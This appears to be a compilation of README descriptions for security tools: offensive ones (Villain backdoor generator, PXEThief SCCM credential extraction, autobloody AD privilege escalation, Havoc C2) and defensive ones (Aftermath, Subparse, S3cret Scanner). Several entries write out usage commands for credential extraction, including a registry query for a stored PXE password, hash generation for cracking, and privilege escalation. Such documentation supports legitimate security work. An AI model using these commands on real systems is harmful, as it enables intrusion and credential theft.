ExchangeFinder is a simple and open-source tool that tries to find Microsoft Exchange instances for a given domain based on the most common DNS names used for Microsoft Exchange.
ExchangeFinder can identify the exact version of Microsoft Exchange, from Microsoft Exchange 4.0 up to Microsoft Exchange Server 2019.
ExchangeFinder will first try to resolve any subdomain that is commonly used for Exchange servers, then it will send a couple of HTTP requests and parse the content of the responses to identify whether the host is running Microsoft Exchange.
Currently, the tool has a signature for every version of Microsoft Exchange from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019, and based on the build version sent by Exchange via the X-OWA-Version header, it can identify the exact version.
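As an illustration of that header-based lookup (the prefix table below is a simplified stand-in, not ExchangeFinder's actual signature database):

```python
# Hypothetical sketch: map an X-OWA-Version build number to a product name.
# The build prefixes below are illustrative examples only.
KNOWN_BUILDS = {
    "15.2": "Exchange Server 2019",
    "15.1": "Exchange Server 2016",
    "15.0": "Exchange Server 2013",
    "14.3": "Exchange Server 2010 SP3",
}

def identify_exchange(owa_version: str) -> str:
    """Return a product name for an X-OWA-Version header value."""
    prefix = ".".join(owa_version.split(".")[:2])  # e.g. "15.1.2375.18" -> "15.1"
    return KNOWN_BUILDS.get(prefix, f"Unknown build ({owa_version})")

print(identify_exchange("15.1.2375.18"))  # Exchange Server 2016
```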
If the tool finds a valid Microsoft Exchange instance, it will return the following results:
Clone the latest version of ExchangeFinder using the following command:
git clone https://github.com/mhaskar/ExchangeFinder
And then install all the requirements using the command poetry install.
┌──(kali㉿kali)-[~/Desktop/ExchangeFinder]
└─$ poetry install
Installing dependencies from lock file
Package operations: 15 installs, 0 updates, 0 removals
• Installing pyparsing (3.0.9)
• Installing attrs (22.1.0)
• Installing certifi (2022.6.15)
• Installing charset-normalizer (2.1.1)
• Installing idna (3.3)
• Installing more-itertools (8.14.0)
• Installing packaging (21.3)
• Installing pluggy (0.13.1)
• Installing py (1.11.0)
• Installing urllib3 (1.26.12)
• Installing wcwidth (0.2.5)
• Installing dnspython (2.2.1)
• Installing pytest (5.4.3)
• Installing requests (2.28.1)
• Installing termcolor (1.1.0)
Installing the current project: ExchangeFinder (0.1.0)
┌──(kali㉿kali)-[~/Desktop/ExchangeFinder]
└─$ python3 exchangefinder.py
______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/
Find that Microsoft Exchange server ..
[-] Please use --domain or --domains option
โโโ(kali 27;kali)-[~/Desktop/ExchangeFinder]
โโ$
You can use the option -h to show the help banner.
To scan a single domain, you can use the option --domain like the following:
askar•/opt/redteaming/ExchangeFinder(main)» python3 exchangefinder.py --domain dummyexchangetarget.com
______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/
Find that Microsoft Exchange server ..
[!] Scanning domain dummyexchangetarget.com
[+] The following MX records found for the main domain
10 mx01.dummyexchangetarget.com.
[!] Scanning host (mail.dummyexchangetarget.com)
[+] IIS server detected (https://mail.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://mail.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0
[!] Scanning host (autodiscover.dummyexchangetarget.com)
[+] IIS server detected (https://autodiscover.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://autodiscover.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://autodiscover.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fautodiscover.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0
askar•/opt/redteaming/ExchangeFinder(main)»
To scan multiple domains (targets), you can use the option --domains and choose a file like the following:
askar•/opt/redteaming/ExchangeFinder(main)» python3 exchangefinder.py --domains domains.txt
______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/
Find that Microsoft Exchange server ..
[+] Total domains to scan are 2 domains
[!] Scanning domain externalcompany.com
[+] The following MX records found for the main domain
20 mx4.linfosyshosting.nl.
10 mx3.linfosyshosting.nl.
[!] Scanning host (mail.externalcompany.com)
[+] IIS server detected (https://mail.externalcompany.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://mail.externalcompany.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.externalcompany.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.externalcompany.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0
[!] Scanning domain o365.cloud
[+] The following MX records found for the main domain
10 mailstore1.secureserver.net.
0 smtp.secureserver.net.
[!] Scanning host (mail.o365.cloud)
[+] IIS server detected (https://mail.o365.cloud)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://mail.o365.cloud
Exchange version : Exchange Server 2013 CU23 May22SU
Login page : https://mail.o365.cloud/owa/auth/logon.aspx?url=https%3a%2f%2fmail.o365.cloud%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/8.5
askar•/opt/redteaming/ExchangeFinder(main)»
Please note that the example domains used in the screenshots resolve in the lab only.
This tool is very simple and I was using it to save some time while searching for Microsoft Exchange instances; feel free to open a PR if you find any issue or have something new to add.
This project is licensed under the GPL-3.0 License - see the LICENSE file for details
Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.
The main idea behind the payloads generated by this tool is inherited from HoaxShell. One could say that Villain is an evolved, steroid-induced version of it.
[2022-11-30] Recent & awesome, made by John Hammond -> youtube.com/watch?v=pTUggbSCqA0
[2022-11-14] Original release demo, made by me -> youtube.com/watch?v=NqZEmBsLCvQ
Disclaimer: Running the payloads generated by this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.
git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt
You should run as root:
Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]
For more information about using Villain check out the Usage Guide.
A few notes about the http(s) beacon-like reverse shell approach:
Pull requests are generally welcome. Please keep in mind: I am constantly working on new offsec tools as well as maintaining several existing ones. I rarely accept pull requests, either because I have a plan for the course of a project or because I judge that the foreign code would be hard to test and/or maintain. It doesn't have to do with how good or bad an idea is; it's just too much work, and I am also developing all these tools to learn myself.
There are parts of this project that were removed before publishing because I considered them to be buggy or hard to maintain (at this early stage). If you have an idea for an addition that comes with a significant chunk of code, I suggest you first contact me to discuss if there's something similar already in the making, before making a PR.
PXEThief is a set of tooling that implements attack paths discussed at the DEF CON 30 talk Pulling Passwords out of Configuration Manager (https://forum.defcon.org/node/241925) against the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager (or ConfigMgr, still commonly known as SCCM). It allows for credential gathering from configured Network Access Accounts (https://docs.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account) and any Task Sequence Accounts or credentials stored within ConfigMgr Collection Variables that have been configured for the "All Unknown Computers" collection. These Active Directory accounts are commonly overpermissioned and allow for privilege escalation to administrative access somewhere in the domain, at least in my personal experience.
Likely, the most serious attack that can be executed with this tooling would involve PXE-initiated deployment being supported for "All unknown computers" on a distribution point without a password, or with a weak password. The overpermissioning of ConfigMgr accounts exposed to OSD mentioned earlier can then allow for a full Active Directory attack chain to be executed with only network access to the target environment.
python pxethief.py -h
pxethief.py 1 - Automatically identify and download encrypted media file using DHCP PXE boot request. Additionally, attempt exploitation of blank media password when auto_exploit_blank_password is set to 1 in 'settings.ini'
pxethief.py 2 <IP Address of DP Server> - Coerce PXE Boot against a specific MECM Distribution Point server designated by IP address
pxethief.py 3 <variables-file-name> <Password-guess> - Attempt to decrypt a saved media variables file (obtained from PXE, bootable or prestaged media) and retrieve sensitive data from MECM DP
pxethief.py 4 <variables-file-name> <policy-file-path> <password> - Attempt to decrypt a saved media variables file and Policy XML file retrieved from a stand-alone TS media
pxethief.py 5 <variables-file-name> - Print the hash corresponding to a specified media variables file for cracking in Hashcat
pxethief.py 6 <identityguid> <identitycert-file-name> - Retrieve task sequences using the values obtained from registry keys on a DP
pxethief.py 7 <Reserved1-value> - Decrypt stored PXE password from SCCM DP registry key (reg query HKLM\software\microsoft\sms\dp /v Reserved1)
pxethief.py 8 - Write new default 'settings.ini' file in PXEThief directory
pxethief.py 10 - Print Scapy interface table to identify interface indexes for use in 'settings.ini'
pxethief.py -h - Print PXEThief help text
pxethief.py 5 <variables-file-name> should be used to generate a 'hash' of a media variables file that can be used for password guessing attacks with the Hashcat module published at https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module.
The 'settings.ini' file in the main PXEThief folder is used to set more static configuration options. These are as follows:
[SCAPY SETTINGS]
automatic_interface_selection_mode = 1
manual_interface_selection_by_id =
[HTTP CONNECTION SETTINGS]
use_proxy = 0
use_tls = 0
[GENERAL SETTINGS]
sccm_base_url =
auto_exploit_blank_password = 1
automatic_interface_selection_mode will attempt to determine the best interface for Scapy to use automatically, for convenience. It does this using two main techniques. If set to 1, it will attempt to use the interface that can reach the machine's default gateway as the output interface. If set to 2, it will look for the first interface it finds with an IP address that is not an autoconfigure or localhost IP address. This will fail to select the appropriate interface in some scenarios, which is why you can force the use of a specific interface with 'manual_interface_selection_by_id'.
manual_interface_selection_by_id allows you to specify the integer index of the interface you want Scapy to use. The ID to use in this file should be obtained from running pxethief.py 10.
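As a rough illustration of the mode-2 heuristic described above (the interface data here is invented for the example; PXEThief itself works from Scapy's interface table):

```python
# Illustrative sketch of "first interface with a usable address": skip
# loopback (127.x) and APIPA/autoconfigure (169.254.x) addresses and
# return the index of the first remaining interface.
def pick_interface(interfaces):
    """interfaces: list of (index, ip_address) tuples."""
    for idx, ip in interfaces:
        if ip.startswith("127.") or ip.startswith("169.254."):
            continue
        return idx
    return None  # no suitable interface found

ifaces = [(1, "127.0.0.1"), (2, "169.254.10.5"), (3, "192.168.1.20")]
print(pick_interface(ifaces))  # 3
```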
sccm_base_url is useful for overriding the Management Point that the tooling will speak to. This is useful if DNS does not resolve (so the value read from the media variables file cannot be used) or if you have identified multiple Management Points and want to send your traffic to a specific one. This should be provided in the form of a base URL, e.g. http://mp.configmgr.com instead of mp.configmgr.com or http://mp.configmgr.com/stuff.
auto_exploit_blank_password changes the behaviour of pxethief 1 to automatically attempt to exploit a non-password-protected PXE Distribution Point. Setting this to 1 will enable auto exploitation, while setting it to 0 will print the tftp client string you should use to download the media variables file. Note that almost all of the time you will want this set to 1, since non-password-protected PXE makes use of a binary key that is sent in the DHCP response you receive when you ask the Distribution Point to perform a PXE boot.
Not implemented in this release
pip install -r requirements.txt
Run pxethief.py 1 or pxethief.py 2 to identify and generate a media variables file. Make sure the interface used by the tool is set to the correct one; if it is not, manually set it in 'settings.ini' by identifying the right index ID to use from pxethief.py 10.
The address of the proxy can be set on line 693 of pxethief.py. I am planning to move this feature to be configurable in 'settings.ini' in the next update to the code base.
PXEThief requires pywin32 in order to utilise some built-in Windows cryptography functions. This is not available on Linux, since the Windows cryptography APIs are not available on Linux :P The Scapy code in pxethief.py, however, is fully functional on Linux, but you will need to patch out (at least) the include of win32crypt to get it to run under Linux.
Expect to run into issues with error handling with this tool; there are subtle nuances with everything in ConfigMgr and, while I have improved the error handling substantially in preparation for the tool's release, it is in no way complete. If there are edge cases that fail, make a detailed issue or fix it and make a pull request :) I'll review these to see where reasonable improvements can be made. Read the code/watch the talk and understand what is going on if you are going to run it in a production environment. Keep in mind the licensing terms - i.e. use of the tool is at your own risk.
Identifying and retrieving credentials from SCCM/MECM Task Sequences - In this post, I explain the entire flow of how ConfigMgr policies are found, downloaded and decrypted after a valid OSD certificate is obtained. I also want to highlight the first two references in this post as they show very interesting offensive SCCM research that is ongoing at the moment.
DEF CON 30 Slides - Link to the talk slides
Copyright (C) 2022 Christopher Panayi, MWR CyberSec
Subparse is a modular framework developed by Josh Strochein, Aaron Baker, and Odin Bernstein. The framework is designed to parse and index malware files and present the information found during parsing in a searchable web-viewer. The framework is modular, making use of a core parsing engine, parsing modules, and a variety of enrichers that add additional information to the malware indices. The main input values for the framework are directories of malware files, which the core parsing engine or a user-specified parsing engine parses before adding additional information from any user-specified enrichment engine, all before indexing the parsed information into an Elasticsearch index. The information gathered can then be searched and viewed via a web-viewer, which also allows for filtering on any value gathered from any file. There are currently three default parsing modules (ELFParser, OLEParser and PEParser) and four enrichment modules (ABUSEEnricher, CAPEEnricher, STRINGEnricher and YARAEnricher).
To get started using Subparse there are a few required/recommended programs that need to be installed and set up before trying to work with our software.
Software | Status | Link |
---|---|---|
Docker | Required | Installation Guide |
Python3.8.1 | Required | Installation Guide |
Pyenv | Recommended | Installation Guide |
After getting the required/recommended software installed to your system there are a few other steps that need to be taken to get Subparse installed.
sudo apt-get install build-essential
pip3 install -r ./requirements.txt
docker-compose up
Note: This might take a little time due to downloading the images and setting up the containers that will be needed by Subparse.
Command line options that are available for subparse/parser/subparse.py:
Argument | Alternative | Required | Description |
---|---|---|---|
-h | --help | No | Shows help menu |
-d SAMPLES_DIR | --directory SAMPLES_DIR | Yes | Directory of samples to parse |
-e ENRICHER_MODULES | --enrichers ENRICHER_MODULES | No | Enricher modules to use for additional parsing |
-r | --reset | No | Reset/delete all data in the configured Elasticsearch cluster |
-v | --verbose | No | Display verbose commandline output |
-s | --service-mode | No | Enters service mode allowing for more samples to be added to the SAMPLES_DIR while processing |
To view the results from Subparse's parsers, navigate to localhost:8080. If you are having trouble viewing the site, make sure that you have the container started up in Docker and that there is not another process running on port 8080 that could cause the site to not be available.
Before any parser is executed general information is collected about the sample regardless of the underlying file type. This information includes:
Parsers are ONLY executed on samples that match their file type. For example, PE files will by default have the PEParser executed against them, because the file type corresponds with those the PEParser is able to examine.
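That dispatch-by-file-type behaviour can be sketched as a lookup on magic bytes (this is an illustration, not Subparse's actual code):

```python
# Illustrative parser dispatch: match a sample's leading magic bytes to the
# parser module able to examine that file type.
MAGIC_PARSERS = [
    (b"MZ", "PEParser"),                 # Windows PE executables
    (b"\x7fELF", "ELFParser"),           # Linux ELF binaries
    (b"\xd0\xcf\x11\xe0", "OLEParser"),  # OLE compound documents
]

def select_parser(sample_bytes: bytes):
    for magic, parser in MAGIC_PARSERS:
        if sample_bytes.startswith(magic):
            return parser
    return None  # no type-specific parser; only general info is collected

print(select_parser(b"MZ\x90\x00"))  # PEParser
```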
These modules are optional modules that will ONLY get executed if specified via the -e | --enrichers flag on the command line.
Subparse's web view was built using Bootstrap for its CSS, this allows for any built in Bootstrap CSS to be used when developing your own custom Parser/Enricher Vue.js files. We have also provided an example for each to help get started and have also implemented a few custom widgets to ease the process of development and to promote standardization in the way information is being displayed. All Vue.js files are used for dynamically displaying information from the custom Parser/Enricher and are used as templates for the data.
Note: Naming conventions for both class and file names must be strictly adhered to; this is the first thing that should be checked if you run into issues getting your custom Parser/Enricher to be executed. The naming convention of your Parser/Enricher must use the same name across all of the files and class names.
The logger object is a singleton implementation of the default Python logger. For in-depth usage please reference the official documentation. For Subparse, the only logging methods we recommend using are the standard logging level methods for output (e.g. debug, info, warning, error, critical).
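Since the logger is a thin singleton over Python's logging module, the behaviour can be illustrated with the standard library alone (the logger name "subparse" is assumed here for illustration):

```python
import logging

# logging.getLogger(name) always returns the same object for the same name,
# which is the singleton behaviour a wrapper like this relies on.
log_a = logging.getLogger("subparse")
log_b = logging.getLogger("subparse")
assert log_a is log_b  # same underlying logger object

# Recommended usage: emit output through the level methods.
log_a.setLevel(logging.DEBUG)
log_a.addHandler(logging.StreamHandler())
log_a.info("enricher finished")
log_a.debug("raw parser output")
```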
A Python3 terminal application that contains 260+ Neo4j cyphers for BloodHound data sets.
BloodHound is a staple tool for every red teamer. However, there are some negative side effects based on its design. I will cover the biggest pain points I've experienced and what this tool aims to address:
Instead of JSON graphs, I need graph results in a line-by-line, grep/cut/awk-friendly .txt format.
This tool can also help blue teams to reveal detailed information about their Active Directory environments as well.
Take back control of your BloodHound data with cypherhound!
Make sure to have python3 installed and run:
python3 -m pip install -r requirements.txt
Start the program with: python3 cypherhound.py -u <neo4j_username> -p <neo4j_password>
The full command menu is shown below:
Command Menu
set - used to set search parameters for cyphers, double/single quotes not required for any sub-commands
sub-commands
user - the user to use in user-specific cyphers (MUST include @domain.name)
group - the group to use in group-specific cyphers (MUST include @domain.name)
computer - the computer to use in computer-specific cyphers (SHOULD include .domain.name or @domain.name)
regex - the regex to use in regex-specific cyphers
example
set user svc-test@domain.local
set group domain admins@domain.local
set computer dc01.domain.local
set regex .*((?i)web).*
run - used to run cyphers
parameters
cypher number - the number of the cypher to run
example
run 7
export - used to export cypher results to txt files
parameters
cypher number - the number of the cypher to run and then export
output filename - the name of the output file, extension not needed
raw - write raw output or just end object (optional)
example
export 31 results
export 42 results2 raw
list - used to show a list of cyphers
parameters
list type - the type of cyphers to list (general, user, group, computer, regex, all)
example
list general
list user
list group
list computer
list regex
list all
q, quit, exit - used to exit the program
clear - used to clear the terminal
help, ? - used to display this help menu
Notes:
- Requires a Neo4j database and URI
- Built for BloodHound 4.2.0; certain edges will not work for previous versions
- Windows users must run pip3 install pyreadline3
- Some cyphers may take a long time to export (whether raw or not) due to their unpredictable number of nodes
- Azure edges are not included
Please be descriptive with any issues you decide to open and, if possible, provide output (if applicable).
Aftermath is a Swift-based, open-source incident response framework.
Aftermath can be leveraged by defenders in order to collect and subsequently analyze the data from the compromised host. Aftermath can be deployed from an MDM (ideally), but it can also run independently from the infected user's command line.
Aftermath first runs a series of modules for collection. The output of this will either be written to the location of your choice, via the -o or --output option, or by default it is written to the /tmp directory.
Once collection is complete, the final zip/archive file can be pulled from the end user's disk. This file can then be analyzed using the --analyze argument pointed at the archive file. The results of this will be written to the /tmp directory. The administrator can then unzip that analysis directory and see a parsed view of the locally collected databases, a timeline of files with the file creation, last accessed, and last modified dates (if they're available), and a storyline which includes the file metadata, database changes, and browser information to potentially track down the infection vector.
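The timeline step can be pictured as merging per-file timestamps into one chronologically sorted event list. This is a hypothetical sketch (the field names are illustrative, not Aftermath's actual output schema):

```python
from datetime import datetime

# Invented example metadata for two collected files.
files = [
    {"path": "/tmp/payload", "created": "2022-11-01T10:02:00", "modified": "2022-11-01T10:05:00"},
    {"path": "/Users/user/doc.pdf", "created": "2022-11-01T09:55:00", "modified": "2022-11-01T09:55:00"},
]

events = []
for f in files:
    for kind in ("created", "modified"):
        if f.get(kind):  # timestamps are only included "if they're available"
            events.append((datetime.fromisoformat(f[kind]), kind, f["path"]))

events.sort()  # chronological storyline, oldest event first
for ts, kind, path in events:
    print(ts.isoformat(), kind, path)
```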
To build Aftermath locally, clone it from the repository
git clone https://github.com/jamf/aftermath.git
cd
into the Aftermath directory
cd <path_to_aftermath_directory>
Build using Xcode
xcodebuild
cd
into the Release folder
cd build/Release
Run aftermath
sudo ./aftermath
Aftermath needs to be root, as well as have full disk access (FDA) in order to run. FDA can be granted to the Terminal application in which it is running.
The default usage of Aftermath runs
sudo ./aftermath
To specify certain options
sudo ./aftermath [option1] [option2]
Examples
sudo ./aftermath -o /Users/user/Desktop --deep
sudo ./aftermath --analyze <path_to_collection_zip>
There is an Aftermath.pkg available under Releases. This pkg is signed and notarized. It will install the aftermath binary at /usr/local/bin/
. This would be the ideal way to deploy via MDM. Since this is installed in bin
, you can then run aftermath like
sudo aftermath [option1] [option2]
To uninstall the aftermath binary, run the AftermathUninstaller.pkg
from the Releases. This will uninstall the binary and also run aftermath --cleanup
to remove aftermath directories. If any aftermath directories reside elsewhere, from using the --output
command, it is the responsibility of the user/admin to remove said directories.
Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.
Havoc is in an early state of release. Breaking changes may be made to APIs/core structures as the framework matures.
Consider supporting C5pider on Patreon/Github Sponsors. Additional features are planned for supporters in the future, such as custom agents/plugins/commands/etc.
Please see the Wiki for complete documentation.
Havoc works well on Debian 10/11, Ubuntu 20.04/22.04 and Kali Linux. It's recommended to use the latest versions possible to avoid issues. You'll need a modern version of Qt and Python 3.10.x to avoid build issues.
See the Installation guide in the Wiki for instructions. If you run into issues, check the Known Issues page as well as the open/closed Issues list.
Cross-platform UI written in C++ and Qt
Written in Golang
Havoc's flagship agent written in C and ASM
You can join the official Havoc Discord to chat with the community!
To contribute to the Havoc Framework, please review the guidelines in Contributing.md and then open a pull-request!
OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:
OFRAK supports a range of embedded firmware file formats beyond userspace executables, including:
OFRAK equips users with:
See ofrak.com for more details.
The web-based GUI view provides a navigable resource tree. For the selected resource, it also provides: metadata, hex or text navigation, and a mini map sidebar for quickly navigating by entropy, byteclass, or magnitude. The GUI also allows for actions normally available through the Python API like commenting, unpacking, analyzing, modifying and packing resources.
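The entropy view in the minimap can be understood as Shannon entropy computed over windows of bytes. A minimal, standalone illustration of the per-buffer calculation (not OFRAK's actual implementation, which works over a sliding window):

```python
import math
from collections import Counter

def byte_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 = constant, 8.0 = maximally random."""
    if not data:
        return 0.0
    total = len(data)
    probs = [count / total for count in Counter(data).values()]
    return -sum(p * math.log2(p) for p in probs) or 0.0  # map -0.0 to 0.0

print(byte_entropy(b"\x00" * 64))        # 0.0 (constant data)
print(byte_entropy(bytes(range(256))))   # 8.0 (every byte value exactly once)
```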
OFRAK uses Git LFS. This means that you must have Git LFS installed before you clone the repository! Install Git LFS by following the instructions here. If you accidentally cloned the repository before installing Git LFS, cd into the repository and run git lfs pull.
See docs/environment-setup for detailed instructions on how to install OFRAK.
OFRAK has general documentation and API documentation. Both can be viewed at ofrak.com/docs.
If you wish to make changes to the documentation or serve it yourself, follow the directions in docs/README.md.
The code in this repository comes with an OFRAK Community License, which is intended for educational uses, personal development, or just having fun.
Users interested in OFRAK for commercial purposes can request the Pro License, which for a limited period is available for a free 6-month trial. See OFRAK Licensing for more information.
Red Balloon Security is excited for security researchers and developers to contribute to this repository.
For details, please see our contributor guide and the Python development guide.
Please contact ofrak@redballoonsecurity.com, or write to us on the OFRAK Slack with any questions or issues regarding OFRAK. We look forward to getting your feedback! Sign up for the OFRAK Mailing List to receive monthly updates about OFRAK code improvements and new features.
This material is based in part upon work supported by the DARPA under Contract No. N66001-20-C-4032. Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the DARPA. Distribution Statement โAโ (Approved for Public Release, Distribution Unlimited).
autobloody is a tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound.
This tool automates the AD privesc between two AD objects, the source (the one we own) and the target (the one we want), if a privesc path exists in the BloodHound database. The automation is composed of two steps:
1. Finding the privesc path with Dijkstra's algorithm on the BloodHound data stored in the Neo4j database
2. Executing this path with the bloodyAD package
Because autobloody relies on bloodyAD, it supports authentication using cleartext passwords, pass-the-hash, pass-the-ticket or certificates and binds to LDAP services of a domain controller to perform AD privesc.
First, if you run it on Linux, you must have libkrb5-dev installed on your OS in order for Kerberos to work:
# Debian/Ubuntu/Kali
apt-get install libkrb5-dev
# Centos/RHEL
yum install krb5-devel
# Fedora
dnf install krb5-devel
# Arch Linux
pacman -S krb5
A python package is available:
pip install autobloody
Or you can clone the repo:
git clone --depth 1 https://github.com/CravateRouge/autobloody
pip install .
First data must be imported into BloodHound (e.g using SharpHound or BloodHound.py) and Neo4j must be running.
⚠️ -ds and -dt values are case sensitive
Simple usage:
autobloody -u john.doe -p 'Password123!' --host 192.168.10.2 -dp 'neo4jP@ss' -ds 'JOHN.DOE@BLOODY.LOCAL' -dt 'BLOODY.LOCAL'
Full help:
[bloodyAD]$ ./autobloody.py -h
usage: autobloody.py [-h] [--dburi DBURI] [-du DBUSER] -dp DBPASSWORD -ds DBSOURCE -dt DBTARGET [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] --host HOST
AD Privesc Automation
options:
-h, --help show this help message and exit
--dburi DBURI The host neo4j is running on (default is "bolt://localhost:7687")
-du DBUSER, --dbuser DBUSER
Neo4j username to use (default is "neo4j")
-dp DBPASSWORD, --dbpassword DBPASSWORD
Neo4j password to use
-ds DBSOURCE, --dbsource DBSOURCE
Case sensitive label of the source node (name property in bloodhound)
-dt DBTARGET, --dbtarget DBTARGET
Case sensitive label of the target node (name property in bloodhound)
-d DOMAIN, --domain DOMAIN
Domain used for NTLM authentication
-u USERNAME, --username USERNAME
Username used for NTLM authentication
-p PASSWORD, --password PASSWORD
Cleartext password or LMHASH:NTHASH for NTLM authentication
-k, --kerberos
-c CERTIFICATE, --certificate CERTIFICATE
Certificate authentication, e.g: "path/to/key:path/to/cert"
-s, --secure Try to use LDAP over TLS aka LDAPS (default is LDAP)
--host HOST Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)
First, a privesc path is found using Dijkstra's algorithm implemented in Neo4j's GDS library. Dijkstra's algorithm solves the shortest path problem on a weighted graph. By default, the edges created by BloodHound don't have a weight but a type (e.g. MemberOf, WriteOwner). A weight is then added to each edge according to the type of edge and the type of node reached (e.g. user, group, domain).
Once a path is generated, autobloody will connect to the DC, execute the path and clean up what is reversible (everything except ForcePasswordChange and setOwner).
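In autobloody this weighted shortest-path search runs inside Neo4j via the GDS library; as a pure-Python illustration of the same idea (the graph, node names and weights below are invented for the example):

```python
import heapq

# Hypothetical per-edge-type costs: cheaper edges are preferred in the path.
EDGE_WEIGHTS = {"MemberOf": 0, "GenericAll": 1, "WriteOwner": 2, "ForceChangePassword": 3}

# Invented miniature BloodHound-style graph: node -> [(neighbour, edge type)].
graph = {
    "JOHN.DOE@BLOODY.LOCAL": [("HELPDESK@BLOODY.LOCAL", "MemberOf")],
    "HELPDESK@BLOODY.LOCAL": [("ADMIN.SVC@BLOODY.LOCAL", "ForceChangePassword")],
    "ADMIN.SVC@BLOODY.LOCAL": [("BLOODY.LOCAL", "GenericAll")],
}

def shortest_path(src, dst):
    """Dijkstra over the weighted edges; returns (total cost, node path)."""
    queue, seen = [(0, src, [src])], set()
    while queue:
        cost, node, path = heapq.heappop(queue)
        if node == dst:
            return cost, path
        if node in seen:
            continue
        seen.add(node)
        for neighbour, edge in graph.get(node, []):
            heapq.heappush(queue, (cost + EDGE_WEIGHTS[edge], neighbour, path + [neighbour]))
    return None

print(shortest_path("JOHN.DOE@BLOODY.LOCAL", "BLOODY.LOCAL"))
```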
For now, only the following BloodHound edges are supported for automatic exploitation:
S3cret Scanner is a tool designed to provide a complementary layer for the Amazon S3 Security Best Practices by proactively hunting secrets in public S3 buckets. It can be executed as a scheduled task or on-demand.
The automation will perform the following actions:
- List the buckets that are public (bucket ACL is Public or objects can be public)
- Scan the files for secrets, including certificate and key files (.p12, .pgp and more)
- Write the findings to a logger.log file.
file.{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"s3:GetLifecycleConfiguration",
"s3:GetBucketTagging",
"s3:ListBucket",
"s3:GetAccelerateConfiguration",
"s3:GetBucketPolicy",
"s3:GetBucketPublicAccessBlock",
"s3:GetBucketPolicyStatus",
"s3:GetBucketAcl",
"s3:GetBucketLocation"
],
"Resource": "arn:aws:s3:::*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": "s3:ListAllMyBuckets",
"Resource": "*"
}
]
}
Create an accounts.csv file in the csv directory, in the following format:
Account name,Account id
prod,123456789
ci,321654987
dev,148739578
Use pip to install the needed requirements.
# Clone the repo
git clone <repo>
# Install requirements
pip3 install -r requirements.txt
# Install trufflehog3
pip3 install trufflehog3
Argument | Values | Description | Required |
---|---|---|---|
-p, --aws_profile | | The AWS profile name for the access keys | ✓ |
-r, --scanner_role | | The AWS scanner's role name | ✓ |
-m, --method | internal | The scan type | ✓ |
-l, --last_modified | 1-365 | Number of days to scan since the file was last modified; Default - 1 | ✗ |
python3 main.py -p secTeam -r secteam-inspect-s3-buckets -l 1
Pull requests and forks are welcome. For major changes, please open an issue first to discuss what you would like to change.
A project created with an aim to emulate and test exfiltration of data over different network protocols. The emulation is performed without the use of native APIs. This will help blue teams write correlation rules to detect any type of C2 communication or data exfiltration.
Currently, this project can help generate HTTP/HTTPS traffic (both GET and POST) using the below mentioned programming/scripting languages:
Download the latest ZIP from the releases page.
With SSL: python3 HTTP-S-EXFIL.py ssl
Without SSL: python3 HTTP-S-EXFIL.py
CNet.exe <Server-IP-ADDRESS> - Select any option
ChashNet.exe <Server-IP-ADDRESS> - Select any option
